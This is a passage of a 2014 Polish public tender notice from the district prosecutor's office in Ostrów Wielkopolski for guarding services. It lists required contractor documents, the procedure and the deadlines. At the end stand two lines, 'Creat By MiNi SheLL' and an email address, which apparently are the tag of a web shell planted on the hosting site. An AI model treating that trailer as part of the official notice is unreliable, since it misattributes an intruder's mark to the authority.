5.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokument ten, winien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
6.	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - dokument ten winien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
7.	wykaz wykonanych usług,
8.	poświadczenia dotyczące wykonanych usług, 
9.	listę podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów albo informację o tym, że Wykonawca nie należy do grupy kapitałowej,
10.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy dokument ten, winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
11.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy - dokument ten, winien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
12.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
13.	koncesja na prowadzenie działalności w zakresie ochrony osób i mienia,
14.	opłacona polisa OC,
15.	pełnomocnictwo - jeżeli osoba osoby podpisujące ofertę działają na jego podstawie,
16.	dokument ustanawiający pełnomocnika w przypadku składania oferty wspólnej (art. 23 ustawy),
17.	oświadczenie Wykonawcy wskazujące, która część zamówienia zostanie powierzona Podwykonawcom - zgodnie z zapisami pkt. Q SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian postanowień niniejszej umowy w stosunku do treści oferty Wykonawcy w sytuacji konieczności wprowadzenia takich zmian wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub gdy zmiany te będą korzystne, tj. przewiduje się możliwość dokonania w umowie:
a)  zmniejszenie zakresu wykonywania usługi w związku ze zmianą ilości siedzib do ochrony - w przypadku likwidacji jednostki,
b) zmiany danych stron umowy (np. siedziby, adresu),
Warunkiem dokonania zmian może być zmiana organizacyjna po stronie Zamawiającego, w szczególności w zakresie jego organizacji i funkcjonowania.
W sytuacji zajścia okoliczności, o których mowa wyżej Zamawiający w terminie do 14 dni od ich wystąpienia powiadomi drugą stronę o tym fakcie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ostrow.po.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PROKURATURA OKRĘGOWA 		                       
w OSTROWIE WIELKOPOLSKIM
ul. KROTOSZYŃSKA 37
63 - 400 OSTRÓW WLKP..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2014 godzina 08:00, miejsce: Bezwzględnie biuro podawcze Zamawiającego w godz. 7:30-15:30.
Termin złożenia - do  19 marca 2014 r. do godz. 8:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com